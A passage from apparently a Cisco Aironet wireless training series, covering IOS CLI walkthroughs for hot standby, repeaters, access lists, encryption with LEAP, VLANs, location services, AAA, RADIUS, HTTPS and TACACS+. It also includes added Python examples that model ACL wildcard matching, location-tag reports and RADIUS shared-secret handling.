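    for o in (".1.3.6.1.2.1.1.4.0", "1.3.6.1.2.1.5.1.0", ".1.3.6.1.4.1.9.2.1.57.0"):
        print(o, "->", oid_to_name(o), describe(o))
```

The tree deliberately stops where the page's figures stop, so a Cisco private OID such as avgBusy1 resolves to iso.org.dod.internet.private.enterprises.cisco followed by the remaining sub-identifiers as numbers.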

Cisco Wireless Challenge 19


Outline
This challenge involves the configuration of the hot standby.
Objectives
The objectives of this challenge are to:

- Define the BVI IP address and subnet mask.
- Define the MAC address of the device to monitor.
- Define the poll-time for the hot standby.
- Define the timeout for the hot standby.

Example
The following sets up the hot standby function:
> en
# config t
(config)# int bvi1
(config-if)# ip address 202.86.171.1 255.255.255.254
(config-if)# int d0
(config-if)# no shut
(config-if)# int e0
(config-if)# no shut
(config-if)# exit
(config)# iapp ?
  standby  Configure AP standby mode parameters
(config)# iapp standby ?
  mac-address       MAC address of the primary AP
  poll-frequency    Standby polling frequency
  primary-shutdown  Shutdown primary radios on failover
  timeout           Standby polling timeout
  <cr>
(config)# iapp standby mac ?
  H.H.H  MAC address of the primary AP Radio
(config)# iapp standby mac-address 00e0.9143.5615
(config)# iapp standby timeout ?
  <5-600>  Standby polling timeout in seconds
(config)# iapp standby timeout 234
(config)# iapp standby poll-frequency ?
  <1-30>  Standby polling frequency in seconds
(config)# iapp standby poll-frequency 11
(config)# iapp standby primary-shutdown ?
  <cr>

Explanation
The hot standby function provides a backup to another access point, and is configured in
the same way, so that if the monitored access point fails the hot standby device can become
active and automatically take over the associated clients. The only setting that differs is
the IP address of the device. In the following configuration, the MAC address of the device
to be monitored is 1111.abcd.ef10. The timeout period within which the device decides that
the monitored device has stopped working is five seconds, and the poll time is two seconds:
# config t
(config)# iapp standby mac-address 1111.abcd.ef10
(config)# iapp standby timeout 5
(config)# iapp standby poll-frequency 2

The hot standby device has a different IP address (as the same address would cause a
conflict when the two devices are operating at the same time), but, for the sake of seamless
operation, the hot standby device must be set up with the following settings identical:

- SSID.
- IP subnet mask.
- Default gateway.
- Data rates.
- Encryption and authentication settings.

... diagrams missed out in demo version

Cisco Wireless Challenge 20

Outline
This challenge involves the configuration of a repeater.
Objectives
The objectives of this challenge are to:

- Define the BVI address and subnet mask.
- Define a repeater role.
- Define the parent MAC address.
- Set up the infrastructure-SSID.

Example IOS Version 12.3
The following sets up the repeater:


> en
# config t
(config)# dot11 ssid mississippi
(config-ssid)# infrastructure-ssid
(config-ssid)# exit
(config)# int bvi1
(config-if)# ip address 160.51.42.9 255.255.128.0
(config-if)# int d0
(config-if)# no shut
(config-if)# ssid mississippi
(config-if)# station ?
  non-root          Non-root (bridge)
  repeater          Repeater access point
  root              Root access point or bridge
  scanner           Scanner access point
  workgroup-bridge  Workgroup Bridge
(config-if)# station repeater
(config-if)# parent ?
  <1-4>    Parent number
  timeout  Time in seconds to look for parent
(config-if)# parent 1 ?
  H.H.H  Parent MAC addr
(config-if)# parent 1 00e0.4e3d.c533 ?
  <cr>
(config-if)# parent 1 00e0.4e3d.c533
(config-if)# parent timeout ?
  <0-65535>  Timeout in seconds

Example IOS Version 12.2
The following sets up the repeater:
> en
# config t
(config)# int bvi1
(config-if)# ip address 160.51.42.9 255.255.128.0
(config-if)# int d0
(config-if)# no shut
(config-if)# ssid mississippi
(config-if-ssid)# infrastructure-ssid
(config-if-ssid)# exit
(config-if)# station ?
  repeater  Repeater access point
  root      Root access point
(config-if)# station repeater
(config-if)# parent ?
  <1-4>    Parent number
  timeout  Time in seconds to look for parent
(config-if)# parent 1 ?
  H.H.H  Parent MAC addr
(config-if)# parent 1 00e0.4e3d.c533 ?
  <cr>
(config-if)# parent 1 00e0.4e3d.c533

Cisco Wireless Challenge 21

Outline
This challenge involves the configuration of a standard access-list.
Objectives
The objectives of this challenge are to:

- Define a standard access-list.
- Apply it on E0.

Example
The following sets up a standard access-list:
> en
# config t
(config)# access-list 3 permit ?
  Hostname or A.B.C.D  Address to match
  any                  Any source host
  host                 A single host address
(config)# access-list 3 permit host 199.237.96.4
(config)# access-list 3 deny host 163.209.141.8
(config)# access-list 3 permit 48.13.112.0 ?
  A.B.C.D  Wildcard bits
  log      Log matches against this entry
  <cr>
(config)# access-list 3 permit 48.13.112.0 0.15.255.255
(config)# access-list 3 deny 208.147.31.0 1.255.255.255
(config)# int e0
(config-if)# ip access-group 3 ?
  in   inbound packets
  out  outbound packets
(config-if)# ip access-group 3 in

Cisco Wireless Challenge 22

Outline
This challenge involves the configuration of an extended ACL.
Objectives
The objectives of this challenge are to:

- Create an extended ACL.
- Apply it inbound on E0.

Example
The following sets up an extended ACL (the network entries use wildcard masks, so a /24
is written as 0.0.0.255, not as the subnet mask 255.255.255.0):
> en
# config t
(config)# access-list 106 ?
  deny     Specify packets to reject
  dynamic  Specify a DYNAMIC list of PERMITs or DENYs
  permit   Specify packets to forward
  remark   Access list entry comment
(config)# access-list 106 permit tcp host 202.33.249.1 host 162.97.253.5 eq syslog
(config)# access-list 106 deny tcp host 197.85.151.8 host 196.123.113.4 eq syslog
(config)# access-list 106 permit tcp 123.183.27.0 0.0.0.255 110.233.17.0 0.0.0.255 eq syslog
(config)# access-list 106 deny tcp 24.81.208.0 0.0.0.255 127.46.93.0 0.0.0.255 eq syslog
(config)# int e0
(config-if)# ip access-group 106 in
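As an added example (not the page's or Cisco's code), the following Python evaluates packets against access-list 3 (Challenge 21) and access-list 106 (Challenge 22) with IOS semantics: a wildcard bit of 1 means the corresponding address bit is ignored, entries are tested in order and the first match decides, and a packet that matches nothing hits the implicit deny at the end of the list. It also shows why writing a subnet mask (255.255.255.0) in the wildcard position does not match a /24. The port number 514 for the syslog keyword and the sample packets are constructed for the example.

```python
# Added example: IOS-style ACL evaluation with wildcard masks, first-match
# ordering and the implicit deny. Entries are transcribed from the page's
# access-list 3 and access-list 106; packets and port 514 are constructed.
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

def ip_int(addr: str) -> int:
    return int(ipaddress.IPv4Address(addr))

def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """IOS wildcard test: only bits whose wildcard bit is 0 must match."""
    care = ~ip_int(wildcard) & 0xFFFFFFFF
    return (ip_int(addr) & care) == (ip_int(base) & care)

@dataclass
class Entry:
    action: str                  # "permit" or "deny"
    src: str
    src_wc: str = "0.0.0.0"      # "host X" == wildcard 0.0.0.0; "any" == 255.255.255.255
    proto: Optional[str] = None  # None for a standard list (source address only)
    dst: Optional[str] = None
    dst_wc: str = "0.0.0.0"
    dst_port: Optional[int] = None

@dataclass
class Packet:
    src: str
    dst: str
    proto: str = "ip"
    dst_port: Optional[int] = None

def evaluate(acl: List[Entry], pkt: Packet) -> str:
    """Return the action of the first matching entry, else the implicit 'deny'."""
    for e in acl:
        if not wildcard_match(pkt.src, e.src, e.src_wc):
            continue
        if e.proto is not None:  # extended-list checks
            if e.proto != pkt.proto:
                continue
            if not wildcard_match(pkt.dst, e.dst, e.dst_wc):
                continue
            if e.dst_port is not None and e.dst_port != pkt.dst_port:
                continue
        return e.action
    return "deny"  # every IOS access list ends with an implicit deny any

# access-list 3 from Challenge 21 (wildcards exactly as on the page)
ACL_3 = [
    Entry("permit", "199.237.96.4"),
    Entry("deny", "163.209.141.8"),
    Entry("permit", "48.13.112.0", "0.15.255.255"),
    Entry("deny", "208.147.31.0", "1.255.255.255"),
]

SYSLOG = 514  # constructed: port the "syslog" keyword stands for

# access-list 106 from Challenge 22 with the /24 networks written as 0.0.0.255
ACL_106 = [
    Entry("permit", "202.33.249.1", "0.0.0.0", "tcp", "162.97.253.5", "0.0.0.0", SYSLOG),
    Entry("deny", "197.85.151.8", "0.0.0.0", "tcp", "196.123.113.4", "0.0.0.0", SYSLOG),
    Entry("permit", "123.183.27.0", "0.0.0.255", "tcp", "110.233.17.0", "0.0.0.255", SYSLOG),
    Entry("deny", "24.81.208.0", "0.0.0.255", "tcp", "127.46.93.0", "0.0.0.255", SYSLOG),
]

# The same /24 entry with a subnet mask in the wildcard position, a common
# mistake: 255.255.255.0 ignores the first three octets and only requires the
# last octet to be 0, so it matches almost none of the intended hosts.
MISTAKEN_ENTRY = Entry("permit", "123.183.27.0", "255.255.255.0", "tcp",
                       "110.233.17.0", "255.255.255.0", SYSLOG)

def mistaken_entry_matches(src: str, dst: str) -> bool:
    return evaluate([MISTAKEN_ENTRY], Packet(src, dst, "tcp", SYSLOG)) == "permit"

if __name__ == "__main__":
    print(evaluate(ACL_3, Packet("48.5.1.1", "10.0.0.1")))
    print(evaluate(ACL_106, Packet("123.183.27.77", "110.233.17.9", "tcp", SYSLOG)))
    print(mistaken_entry_matches("123.183.27.77", "110.233.17.9"))
```

The wildcard 0.15.255.255 on the 48.13.112.0 entry only compares the first octet and the top four bits of the second, so it admits 48.0.0.0 through 48.15.255.255; the same rule applied to a mask of 255.255.255.0 explains why the mistaken entry permits 9.9.9.0 but not 123.183.27.77.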

Cisco Wireless Challenge 23

Outline
This challenge involves the configuration of encryption.
Objectives
The objectives of this challenge are to:

- Define the BVI address and subnet mask.
- Define the encryption key.
- Define LEAP.

Example IOS Version 12.3
The following sets up encryption and LEAP:
> en
# config t
(config)# dot11 ssid ohio
(config-ssid)# authentication ?
  client          LEAP client information
  key-management  key management
  network-eap     leap method
  open            open method
  shared          shared method
(config-ssid)# authentication network-eap ?
  WORD  leap list name (1 -- 31 characters)
(config-ssid)# auth net newhampshire ?
  mac-address  mac-address authentication method
  <cr>
(config-ssid)# authentication network-eap newhampshire
(config-ssid)# exit
(config)# int bvi1
(config-if)# ip address 143.224.21.9 255.240.0.0
(config-if)# int d0
(config-if)# encry ?
  key   Set one encryption key
  mode  encryption mode
  vlan  vlan
(config-if)# encry key ?
  <1-4>  key number 1-4
(config-if)# encry key 1 ?
  size  Key size
(config-if)# encry key 1 size ?
  128bit  128-bit key
  40bit   40-bit key
(config-if)# encry key 1 size 128bit ?
  0         Specifies an UNENCRYPTED key will follow
  7         Specifies a HIDDEN key will follow
  Hex-data  26 hexadecimal digits
(config-if)# encry key 1 size 128bit ffffffffffffffffffffffffff
(config-if)# encryp mode ?
  ciphers  Optional data ciphers
  wep      Classic 802.11 privacy algorithm
(config-if)# encryp mode ciphers ?
  ckip       Cisco Per packet key hashing
  ckip-cmic  Cisco Per packet key hashing and MIC (MMH)
  cmic       Cisco MIC (MMH)
  tkip       WPA Temporal Key encryption
  wep128     128 bit key
  wep40      40 bit key
(config-if)# encryp mode ciphers ckip
(config-if)# ssid ohio

Example IOS Version 12.1
The following sets up encryption and LEAP:
> en
# config t
Enter configuration commands, one per line. End with CNTL/Z.
(config)# int bvi1
(config-if)# ip address 143.224.21.9 255.240.0.0
(config-if)# int d0
(config-if)# encry ?
  key   Set one encryption key
  mode  encryption mode
  vlan  vlan
(config-if)# encry key ?
  <1-4>  key number 1-4
(config-if)# encry key 1 ?
  size  Key size
(config-if)# encry key 1 size ?
  128bit  128-bit key
  40bit   40-bit key
(config-if)# encry key 1 size 128bit ?
  0         Specifies an UNENCRYPTED key will follow
  7         Specifies a HIDDEN key will follow
  Hex-data  26 hexadecimal digits
(config-if)# encry key 1 size 128bit ffffffffffffffffffffffffff
(config-if)# encryp mode ?
  ciphers  Optional data ciphers
  wep      Classic 802.11 privacy algorithm
(config-if)# encryp mode ciphers ?
  ckip       Cisco Per packet key hashing
  ckip-cmic  Cisco Per packet key hashing and MIC (MMH)
  cmic       Cisco MIC (MMH)
  tkip       WPA Temporal Key encryption
  wep128     128 bit key
  wep40      40 bit key
(config-if)# encryp mode ciphers ckip
(config-if)# ssid ohio
(config-if-ssid)# authentication ?
  client          LEAP client information
  key-management  key management
  network-eap     leap method
  open            open method
  shared          shared method
(config-if-ssid)# authentication network-eap ?
  WORD  leap list name (1 -- 31 characters)
(config-if-ssid)# authentication network-eap newhampshire

Cisco Wireless Challenge 24

Outline
This challenge involves the configuration of mobile IP.
Objectives
The objectives of this challenge are to:

- Enable proxy-mobile on the device, and on the interface ports.

Example
The following sets up mobile IP:
> en
# config t
(config)# ip proxy-mobile ?
  aap     Authoritative AP
  enable  Enable WLAN Proxy Mobile IP
  pause   Disables Proxy Mobile IP without removing configuration
  secure  Security association
(config)# ip proxy-mobile enable
(config)# int bvi1
(config-if)# ?
Interface configuration commands:
  access-expression       Build a bridge boolean access expression
  arp                     Set arp type (arpa, probe, snap) or timeout
  bandwidth               Set bandwidth informational parameter
  bridge-group            Transparent bridging interface parameters
  carrier-delay           Specify delay for interface transitions
  cdp                     CDP interface subcommands
  custom-queue-list       Assign a custom queue list to an interface
  dampening               Enable event dampening
  default                 Set a command to its defaults
  delay                   Specify interface throughput delay
  description             Interface specific description
  duplex                  Configure duplex operation.
  exit                    Exit from interface configuration mode
  fair-queue              Enable Fair Queuing on an Interface
  full-duplex             Configure full-duplex operational mode
  half-duplex             Configure half-duplex and related commands
  help                    Description of the interactive help system
  hold-queue              Set hold queue depth
  ip                      Interface Internet Protocol config commands
  keepalive               Enable keepalive
  l2-filter               Set Layer2 ACL for packet received by upper layer protocols
  load-interval           Specify interval for load calculation for an interface
  logging                 Configure logging for interface
  loopback                Configure internal loopback on an interface
  mac-address             Manually set interface MAC address
  max-reserved-bandwidth  Maximum Reservable Bandwidth on an Interface
  mtu                     Set the interface Maximum Transmission Unit (MTU)
  no                      Negate a command or set its defaults
  ntp                     Configure NTP
  priority-group          Assign a priority group to an interface
  random-detect           Enable Weighted Random Early Detection (WRED) on an Interface
  service-policy          Configure QoS Service Policy
  shutdown                Shutdown the selected interface
  snmp                    Modify SNMP interface parameters
  speed                   Configure speed operation.
  timeout                 Define timeout values for this interface
  transmit-interface      Assign a transmit interface to a receive-only interface
  tx-ring-limit           Configure PA level transmit ring limit
(config-if)# ip proxy-mobile ?
  <cr>
(config-if)# ip proxy-mobile
(config-if)# int d0
(config-if)# ip proxy-mobile
(config-if)# int e0
(config-if)# ip proxy-mobile

Cisco Wireless Challenge 25

Outline
This challenge involves the configuration of a VLAN.
Objectives
The objectives of this challenge are to:

- Define a VLAN.
- Enable 802.1q on sub-interfaces.

Example
> en
# config t
(config)# dot11 ssid test
(config-ssid)# vlan 10
(config-ssid)# exit
(config)# int d0.1
(config-subif)# ?
Interface configuration commands:
  arp             Set arp type (arpa, probe, snap) or timeout
  bandwidth       Set bandwidth informational parameter
  bridge-group    Transparent bridging interface parameters
  cdp             CDP interface subcommands
  default         Set a command to its defaults
  delay           Specify interface throughput delay
  description     Interface specific description
  encapsulation   Set encapsulation type for an interface
  exit            Exit from interface configuration mode
  ip              Interface Internet Protocol config commands
  keepalive       Enable keepalive
  logging         Configure logging for interface
  mtu             Set the interface Maximum Transmission Unit (MTU)
  no              Negate a command or set its defaults
  service-policy  Configure QoS Service Policy
  shutdown        Shutdown the selected interface
  timeout         Define timeout values for this interface
(config-subif)# encapsulation ?
  dot1Q  IEEE 802.1Q Virtual LAN
(config-subif)# encapsulation dot1q ?
  <1-4094>  IEEE 802.1Q VLAN ID
(config-subif)# encapsulation dot1q 1 ?
  native        Make this as native vlan
  second-dot1q  Configure this subinterface as a 1Q-in-1Q subinterface
  <cr>
(config-subif)# encapsulation dot1Q 10 native
(config-subif)# exit
(config)# int fa0.1
(config-subif)# encapsulation dot1Q 10 native
(config-subif)# exit

Cisco Wireless Challenge 26

Outline
This is an intermediate test, which revises some of the main principles of wireless
configuration. It will test knowledge of:

- Hostname.
- BVI settings.
- Gateway setting.
- Domain name setting.
- D0 settings.
- SSID settings.
- Username and password.
- HTTP enable.

Cisco Wireless Challenge 27

Outline
This challenge involves the configuration of location based services (LBS).
Objectives
The objectives of this challenge are to:

- Define an LBS profile.
- Define the LBS server address and port.
- Define the LBS interface.

Example
> en
# config t
(config)# dot11 lbs test
(dot11-lbs)# ?
lbs configuration commands:
  channel-match  only reports tag packet in the same tx & rx channel
  exit           Exit from LBS sub mode
  interface      enable LBS on radio interface
  method         method used for AP to locate tag
  multicast      multicast MAC address of LBS TAGs
  no             Negate a command or set its defaults
  packet-type    packet type used by the LBS tag and server
  server         remote LBS server IP address and UDP port number
(dot11-lbs)# server a ?
  A.B.C.D  IP address
(dot11-lbs)# server a 1.2.3.4 ?
  port  server UDP port number
(dot11-lbs)# server a 1.2.3.4 p ?
  <1024-65535>  port number
(dot11-lbs)# server a 10.0.0.1 port 1024 ?
  <cr>
(dot11-lbs)# server address 10.0.0.1 port 1024
(dot11-lbs)# interface d0
(dot11-lbs)# method ?
  rssi  received signal strength identification
(dot11-lbs)# method r ?
  <cr>
(dot11-lbs)# method rssi

Description
With LBS, access points monitor location packets sent by LBS positioning tags, and thus
allow assets to be tracked. On receiving a positioning packet, the access point determines
the received signal strength indication (RSSI). It then creates a UDP packet with the RSSI
value and the current time, which it then forwards to a location server. Next the location
server determines the position of the tag based on the information received.
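As an added example (not from the NetworkSims page), the following Python models the exchange just described: the access point packs the RSSI of a tag's positioning packet and the time it was heard into the UDP payload it would send to the configured LBS server address and port, and the server parses those reports and picks the access point that heard the tag loudest. The report layout (tag MAC, RSSI, timestamp, AP id) is a constructed format for illustration; the page does not give the real LBS packet format, and the sample values are made up.

```python
# Added example: AP-side LBS report and server-side parsing. The wire format
# below is constructed for illustration; it is not the real Cisco LBS format.
import struct
from typing import Dict, Tuple

REPORT = struct.Struct("!6sbIH")  # tag MAC, RSSI in dBm (signed byte), unix time, AP id

def mac_bytes(mac: str) -> bytes:
    """Accept Cisco dotted form (1111.abcd.ef10) or colon form and return 6 raw bytes."""
    digits = mac.replace(".", "").replace(":", "").lower()
    if len(digits) != 12 or any(c not in "0123456789abcdef" for c in digits):
        raise ValueError(f"bad MAC address: {mac!r}")
    return bytes.fromhex(digits)

def lbs_server_port(port: int) -> int:
    """The CLI above only accepts server ports 1024-65535; enforce the same range."""
    if not 1024 <= port <= 65535:
        raise ValueError("LBS server port must be in 1024-65535")
    return port

def build_report(tag_mac: str, rssi_dbm: int, unix_time: int, ap_id: int) -> bytes:
    """AP side: the UDP payload carrying the measured RSSI and the receive time."""
    if not -128 <= rssi_dbm <= 0:
        raise ValueError("RSSI must be a non-positive dBm value that fits one signed byte")
    return REPORT.pack(mac_bytes(tag_mac), rssi_dbm, unix_time, ap_id)

def parse_report(payload: bytes) -> dict:
    """Server side: reject anything that is not exactly one well-formed report."""
    if len(payload) != REPORT.size:
        raise ValueError(f"expected {REPORT.size} bytes, got {len(payload)}")
    mac, rssi, ts, ap_id = REPORT.unpack(payload)
    return {"tag": mac.hex(), "rssi": rssi, "time": ts, "ap": ap_id}

class LocationServer:
    """Keeps the latest (rssi, time) reading of each tag from each access point."""

    def __init__(self) -> None:
        self.readings: Dict[str, Dict[int, Tuple[int, int]]] = {}

    def ingest(self, payload: bytes) -> None:
        r = parse_report(payload)
        self.readings.setdefault(r["tag"], {})[r["ap"]] = (r["rssi"], r["time"])

    def nearest_ap(self, tag_mac: str) -> int:
        """Simplest position estimate: the AP that reported the strongest RSSI."""
        per_ap = self.readings[mac_bytes(tag_mac).hex()]
        return max(per_ap, key=lambda ap: per_ap[ap][0])

if __name__ == "__main__":
    server = LocationServer()
    server.ingest(build_report("1111.abcd.ef10", -60, 1700000000, 1))  # constructed
    server.ingest(build_report("1111.abcd.ef10", -45, 1700000001, 2))  # constructed
    print("nearest AP:", server.nearest_ap("1111.abcd.ef10"))
```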

Cisco Wireless Challenge 28

Outline
This challenge involves the configuration of AAA for local authentication.
Objectives
The objectives of this challenge are to:

- Enable AAA.
- Define local authentication.

Example
The following sets up AAA:
> en
# config t
(config)# aaa new-model
(config)# aaa authentication login default local
(config)# aaa authorization exec local
(config)# aaa authorization network local
(config)# user ?
  WORD  User name
(config)# user test ?
  access-class         Restrict access by access-class
  autocommand          Automatically issue a command after the user logs in
  callback-dialstring  Callback dialstring
  callback-line        Associate a specific line with this callback
  callback-rotary      Associate a rotary group with this callback
  dnis                 Do not require password when obtained via DNIS
  nocallback-verify    Do not require authentication after callback
  noescape             Prevent the user from using an escape character
  nohangup             Do not disconnect after an automatic command
  nopassword           No password is required for the user to log in
  password             Specify the password for the user
  privilege            Set user privilege level
  secret               Specify the secret for the user
  user-maxlinks        Limit the user's number of inbound links
  view                 Set view name
  <cr>
(config)# user test password ?
  0     Specifies an UNENCRYPTED password will follow
  7     Specifies a HIDDEN password will follow
  LINE  The UNENCRYPTED (cleartext) user password
(config)# username test password bert

Cisco Wireless Challenge 29

Outline
This challenge involves the configuration of AAA.
Objectives
The objectives of this challenge are to:

- Enable AAA.
- Define a local RADIUS server.
- Define RADIUS settings.

Example
The following sets up AAA:
> en
# config t
(config)# aaa new-model
(config)# radius-server ?
  attribute           Customize selected radius attributes
  authorization       Authorization processing information
  challenge-noecho    Data echoing to screen is disabled during Access-Challenge
  configure-nas       Attempt to upload static routes and IP pools at startup
  deadtime            Time to stop using a server that doesn't respond
  directed-request    Allow user to specify radius server to use with `@server'
  domain-stripping    Strip the domain from the username
  host                Specify a RADIUS server
  key                 encryption key shared with the radius servers
  local               Configure local RADIUS server
  optional-passwords  The first RADIUS request can be made without requesting a password
  retransmit          Specify the number of retries to active server
  timeout             Time to wait for a RADIUS server to reply
  unique-ident        Higher order bits of Acct-Session-Id
  vsa                 Vendor specific attribute configuration
(config)# radius-server local
(config-radsrv)# ?
Local RADIUS server configuration commands:
  authentication  supported authentication
  eapfast         EAP-FAST configurations
  exit            Exit from local radius server sub mode
  group           Configure client groups
  nas             Configure allowed Network Access Servers
  no              Negate a command or set its defaults
  user            Configure client usernames and passwords
(config-radsrv)# user ?
  WORD  Client username
(config-radsrv)# user giraffe ?
  nthash    Set NT hash of clientpassword
  password  Set client password
(config-radsrv)# user giraffe password root
(config-radsrv)# nas ?
  A.B.C.D  IP address of the NAS
(config-radsrv)# nas 42.55.230.3 ?
  key  Set NAS shared secret
(config-radsrv)# nas 42.55.230.3 key coconut
(config-radsrv)# exit
(config)# radius-server ?
  attribute           Customize selected radius attributes
  authorization       Authorization processing information
  challenge-noecho    Data echoing to screen is disabled during Access-Challenge
  configure-nas       Attempt to upload static routes and IP pools at startup
  deadtime            Time to stop using a server that doesn't respond
  directed-request    Allow user to specify radius server to use with `@server'
  domain-stripping    Strip the domain from the username
  host                Specify a RADIUS server
  key                 encryption key shared with the radius servers
  local               Configure local RADIUS server
  optional-passwords  The first RADIUS request can be made without requesting a password
  retransmit          Specify the number of retries to active server
  timeout             Time to wait for a RADIUS server to reply
  unique-ident        Higher order bits of Acct-Session-Id
  vsa                 Vendor specific attribute configuration
(config)# radius-server host ?
  Hostname or A.B.C.D  IP address of RADIUS server
(config)# radius-server host 42.55.230.3 ?
  acct-port     UDP port for RADIUS accounting server (default is 1646)
  alias         1-8 aliases for this server (max. 8)
  auth-port     UDP port for RADIUS authentication server (default is 1645)
  key           per-server encryption key (overrides default)
  non-standard  Parse attributes that violate the RADIUS standard
  retransmit    Specify the number of retries to active server (overrides default)
  timeout       Time to wait for this RADIUS server to reply (overrides default)
  <cr>
(config)# radius-server host 42.55.230.3 auth 1812 acct 1813
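As an added example (not the page's or Cisco's code), the following Python shows what the shared secret set with "nas 42.55.230.3 key coconut" (and, on the client side, "radius-server key") is actually used for on the wire, following RFC 2865: the NAS hides the User-Password with an MD5 stream keyed by the secret, and the server proves it holds the same secret by signing its reply with the Response Authenticator, which the NAS recomputes before trusting the answer. The NAS address, the user giraffe with password root and the secret coconut come from the transcript above; the 16-byte Request Authenticator is a fixed constructed value here, whereas a real NAS draws a fresh random one per request.

```python
# Added example: RFC 2865 password hiding and Response Authenticator, to show
# how the NAS/server shared secret from the transcript is used. The Request
# Authenticator in the test is a constructed constant, not a random value.
import hashlib
import hmac
import struct
from typing import Dict

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_NAS_IP = 1, 2, 4
HEADER = struct.Struct("!BBH")  # Code, Identifier, Length; 16-byte Authenticator follows

USERS = {b"giraffe": b"root"}  # the local server's "user giraffe password root"

def _md5(*parts: bytes) -> bytes:
    return hashlib.md5(b"".join(parts)).digest()

def hide_password(password: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each with MD5(secret + previous block)."""
    if len(password) > 128:
        raise ValueError("User-Password may be at most 128 octets")
    padded = password + b"\x00" * (-len(password) % 16) or b"\x00" * 16
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        block = bytes(p ^ b for p, b in zip(padded[i:i + 16], _md5(secret, prev)))
        out, prev = out + block, block
    return out

def reveal_password(hidden: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """Inverse of hide_password; the server runs this before checking the password."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        block = hidden[i:i + 16]
        out += bytes(c ^ b for c, b in zip(block, _md5(secret, prev)))
        prev = block
    return out.rstrip(b"\x00")

def attribute(kind: int, value: bytes) -> bytes:
    return struct.pack("!BB", kind, len(value) + 2) + value

def packet(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    return HEADER.pack(code, ident, 20 + len(attrs)) + authenticator + attrs

def response_authenticator(code: int, ident: int, attrs: bytes,
                           req_auth: bytes, secret: bytes) -> bytes:
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    return _md5(HEADER.pack(code, ident, 20 + len(attrs)), req_auth, attrs, secret)

def access_request(user: bytes, password: bytes, nas_ip: str,
                   secret: bytes, req_auth: bytes, ident: int = 7) -> bytes:
    """NAS side: the Access-Request the access point would send to the server."""
    attrs = (attribute(ATTR_USER_NAME, user)
             + attribute(ATTR_USER_PASSWORD, hide_password(password, secret, req_auth))
             + attribute(ATTR_NAS_IP, bytes(int(o) for o in nas_ip.split("."))))
    return packet(ACCESS_REQUEST, ident, req_auth, attrs)

def parse_attributes(pkt: bytes) -> Dict[int, bytes]:
    """Walk the TLV attribute list, rejecting lengths that overrun the packet."""
    _, _, length = HEADER.unpack(pkt[:4])
    attrs, pos = {}, 20
    while pos + 2 <= length:
        kind, alen = pkt[pos], pkt[pos + 1]
        if alen < 2 or pos + alen > length:
            raise ValueError("malformed attribute")
        attrs[kind] = pkt[pos + 2:pos + alen]
        pos += alen
    return attrs

def server_handle(request: bytes, secret: bytes) -> bytes:
    """Local RADIUS server side: unhide the password, check it, sign the reply."""
    code, ident, _ = HEADER.unpack(request[:4])
    if code != ACCESS_REQUEST:
        raise ValueError("not an Access-Request")
    req_auth = request[4:20]
    attrs = parse_attributes(request)
    given = reveal_password(attrs.get(ATTR_USER_PASSWORD, b""), secret, req_auth)
    expected = USERS.get(attrs.get(ATTR_USER_NAME, b""))
    ok = expected is not None and hmac.compare_digest(expected, given)
    reply = ACCESS_ACCEPT if ok else ACCESS_REJECT
    return packet(reply, ident, response_authenticator(reply, ident, b"", req_auth, secret), b"")

def verify_response(response: bytes, request: bytes, secret: bytes) -> bool:
    """NAS side: trust a reply only if its authenticator matches under the shared secret."""
    code, ident, length = HEADER.unpack(response[:4])
    expected = response_authenticator(code, ident, response[20:length], request[4:20], secret)
    return hmac.compare_digest(expected, response[4:20])

def reply_code(response: bytes) -> int:
    return response[0]
```

Two properties follow directly from the code: a server configured with a different secret cannot recover the password (it unhides to garbage and rejects), and its reply fails verification on the NAS, which is why the "nas ... key" on the local server and the "radius-server key" on the client must agree exactly.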

Cisco Wireless Challenge 30

Outline
This challenge involves the configuration of a RADIUS account on an SSID.
Objectives
The objectives of this challenge are to:

- Enable AAA.
- Define RADIUS.
- Define an SSID.
- Associate the RADIUS account with an SSID.

Example
> en
# config t
(config)# aaa new-model
(config)# radius h ?
  Hostname or A.B.C.D  IP address of RADIUS server
(config)# rad h 1.2.3.4 ?
  acct-port     UDP port for RADIUS accounting server (default is 1646)
  alias         1-8 aliases for this server (max. 8)
  auth-port     UDP port for RADIUS authentication server (default is 1645)
  backoff       Retry backoff pattern (Default is retransmits with constant delay)
  key           per-server encryption key (overrides default)
  non-standard  Parse attributes that violate the RADIUS standard
  retransmit    Specify the number of retries to active server (overrides default)
  timeout       Time to wait for this RADIUS server to reply (overrides default)
  <cr>
(config)# radius-server host 42.55.230.3 auth 1812 acct 1813
(config)# dot11 ssid test
(config-ssid)# accounting test-acc

Cisco Wireless Challenge 31

Outline
This challenge involves the configuration of a secure HTTP server (HTTPS), which is more
secure than normal Web access to the access point (HTTP). In an HTTPS connection the data
transmitted is encrypted.
Objectives
The objectives of this challenge are to:

- Define a host name.
- Define the domain name.
- Define the gateway.
- Define an HTTPS server.
- Define the HTTPS port (default: 443).

Example
> en
# config t
(config)# hostname test
(config)# ip default-gateway 192.168.0.1
(config)# ip domain-name perth.cc
(config)# ip http ?
  access-class        Restrict http server access by access-class
  authentication      Set http server authentication method
  client              Set http client parameters
  help-path           HTTP help root URL
  max-connections     Set maximum number of concurrent http server connections
  path                Set base path for HTML
  port                Set http server port
  secure-ciphersuite  Set http secure server ciphersuite
  secure-client-auth  Set http secure server with client authentication
  secure-port         Set http secure server port number for listening
  secure-server       Enable HTTP secure server
  secure-trustpoint   Set http secure server certificate trustpoint
  server              Enable http server
  timeout-policy      Set http server time-out policy parameters
(config)# ip http secure-server
(config)# ip http secure-port ?
  <0-65535>  Secure port number (above 1024 or default 443)
(config)# ip http secure-port 443

Cisco Wireless Challenge 32

Outline
This challenge involves the configuration of TACACS+ for the Aironet.
Objectives
The objectives of this challenge are to:

- Define a host name.
- Define AAA.
- Define TACACS+.

Example
> en
# config t
(config)# hostname test
(config)# aaa new-model
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key krinkle
(config)# aaa authentication login default group tacacs+
(config)# aaa authentication ppp default group tacacs+
(config)# aaa authorization network default group tacacs+
(config)# aaa authorization exec default group tacacs+

Cisco Wireless Challenge 33

